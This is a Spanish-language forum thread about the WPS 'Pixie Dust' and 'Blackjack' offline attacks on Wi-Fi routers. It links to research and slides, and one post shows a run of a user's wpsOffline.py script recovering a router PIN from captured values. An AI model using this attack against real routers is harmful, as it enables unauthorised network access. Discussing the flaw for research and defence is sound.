Autor
|
Tema: Ataque Pixie Dust Attack y Ataque Blackjack (Leído 11,829 veces)
|
ChimoC
Por la libertad y contra el terrorismo
Ex-Staff
Desconectado
Mensajes: 5.129
Paz, dignidad y justicia
|
Buenas: WPS sobre router offline. Captura de paquetes y luego se le arrea que es gerundio. Creo q routers Broadcom y Ralink Saludos ChimoC Edito ---> http://méric.fr/blog/blackjack.html
|
|
« Última modificación: 23 Marzo 2015, 08:05 am por ChimoC »
|
En línea
|
|
|
|
Sh4k4
Desconectado
Mensajes: 965
xMHT
|
iep, always deactive wps es lo que siempre decimos, ahora solo la distancia pone el check mate
|
|
|
En línea
|
|
|
|
engel lex
|
los slides del defcon sobre eso http://www.slideshare.net/0xcite/offline-bruteforce-attack-on-wifi-protected-setupviendo la modificación... si, pixie dust parece necesitar el pin... sin embargo, el blackjack no es mucho más eficiente que un brute force... pero es buen PoC para las preguntas finales del link
|
|
« Última modificación: 23 Marzo 2015, 09:03 am por engel lex »
|
En línea
|
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
|
|
|
*dudux
Ex-Staff
Desconectado
Mensajes: 2.388
.....traficando con sueños.....
|
Se ha columpiado este hombre, la informacion es falsa. Welcome to the Internet, beware of the errors Erratum : I thought the Enrollee was the client, and the Registrar the AP (see spec : Enrollee: A Device seeking to join a WLAN Domain. Once an Enrollee obtains a valid credential, it becomes a Member. Registrar: An entity with the authority to issue and revoke Domain Credentials. A Registrar may be integrated into an AP, or it may be separate from the AP. A Registrar may not have WLAN capability. A given Domain may have multiple Registrars. , but I was wrong. Thus, what I wrote below contains errors. Correction and implementation are left as an exercise to the reader. Sin embargo Dominique tiene toda la razon! Doy fé de ello. He programado un script quick&dirty para probar que los router ralink en vez de usar un numero de 128 bits RANDOM cada vez, usan siempre 0. Unbelievable! $ time python wpsOffline.py -ak 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa :d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c -pke d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5 :75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8 f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2: c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c :b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:3 5:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72: c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5 :26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:f a:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09: 23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d :79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d 9:f8:68:80:11:55:d7:44:6a -pkr bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1 :d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:3 6:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7: 79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0 :c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:9 3:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b: 33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36 :24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:c a:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48: c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4 :a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:0 1:a4:29:77:a9:d4:81:d4:0e -ehash1 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba :ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 -ehash2 b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5 :6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec PIN FOUND! 04847533
real 0m0.488s user 0m0.473s sys 0m0.012s
|
|
« Última modificación: 31 Marzo 2015, 13:37 pm por *dudux »
|
En línea
|
|
|
|
|
engel lex
|
Ayer lo estuve viendo en otro foro y leyendo pero lo sigo sin entender este programa como se ejecuta si hay que descargarse en algún script y donde viene ? En resumen como lo haría funcionar en Wifislax por ejemplo.Saludos.
*dudux responde He programado un script quick&dirty para probar no es algo nivel script, no hay código... solo concepto, es un paper... no es realmente algo revolucionario si lees el documento, es un PoC sobre la vulnerabilidad wps donde quieren dejar en claro que es naturalmente vulnerable y el autor critica que incluso el router le pase la segunda parte del pin (cifrado) al usuario + que muchos router su factor de "randomización" sea predecible en condiciones manejables
|
|
« Última modificación: 1 Abril 2015, 02:35 am por engel lex »
|
En línea
|
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
|
|
|
El_Andaluz
Desconectado
Mensajes: 4.179
|
no es algo nivel script, no hay código... solo concepto, es un paper... no es realmente algo revolucionario si lees el documento, es un PoC sobre la vulnerabilidad wps donde quieren dejar en claro que es naturalmente vulnerable y el autor critica que incluso el router le pase la segunda parte del pin (cifrado) al usuario + que muchos router su factor de "randomización" sea predecible en condiciones manejables He programado un script quick&dirty para probar Yo pensaba que era algo nuevo pero ahoraque has dicho eso ya lo sabía que es vulnerable antes que viniera los romanos jaja no podría pasarnos ese script para nosotros probar también a ver yo la parte de que pase el pin y la otra parte puede ser viable o es perder el tiempo.
|
|
« Última modificación: 1 Abril 2015, 02:51 am por El_Andaluz »
|
En línea
|
|
|
|
engel lex
|
no podría pasar ese script para yo probar también a ver está en bitbucket XD buscalo en google por wpsOffline.py dudux aunque creo que lo modificó porque no tiene los parametros directos...
|
|
« Última modificación: 1 Abril 2015, 02:53 am por engel lex »
|
En línea
|
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
|
|
|
|
engel lex
|
lee el aruticulo antes de andar con tumbos de ciego el pixie dust quedó descartado porque es un escenario donde necesitabas conocer el final para iniciarlo... ve con el blackjack
|
|
|
En línea
|
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Ataque DOS Attack (uso educativo)
Hacking
|
Banker25
|
1
|
3,844
|
8 Mayo 2011, 22:40 pm
por xassiz~
|
|
|
[CODE|ATAQUE REMOTO] ub-aix-ftpd-attack IBM AIX 5.1, 5.2, 5.3, quiza anteriores
Bugs y Exploits
|
D4RIO
|
0
|
3,169
|
21 Enero 2012, 18:04 pm
por D4RIO
|
|
|
PixieScript v2.1, ataque automátizado Pixie Dust Attack
« 1 2 »
Wireless en Linux
|
ChimoC
|
10
|
17,475
|
3 Septiembre 2018, 09:08 am
por BgCRaCK
|
|
|
Reaver modfication for Pixie Dust Attack (pixiewps)
« 1 2 »
Hacking Wireless
|
t6_x
|
14
|
19,022
|
29 Julio 2015, 21:25 pm
por fly7
|
|
|
PixieScript v2.5, ataque automatizado Pixie Dust Attack
Wireless en Linux
|
El_Andaluz
|
0
|
5,481
|
26 Abril 2015, 06:09 am
por El_Andaluz
|
|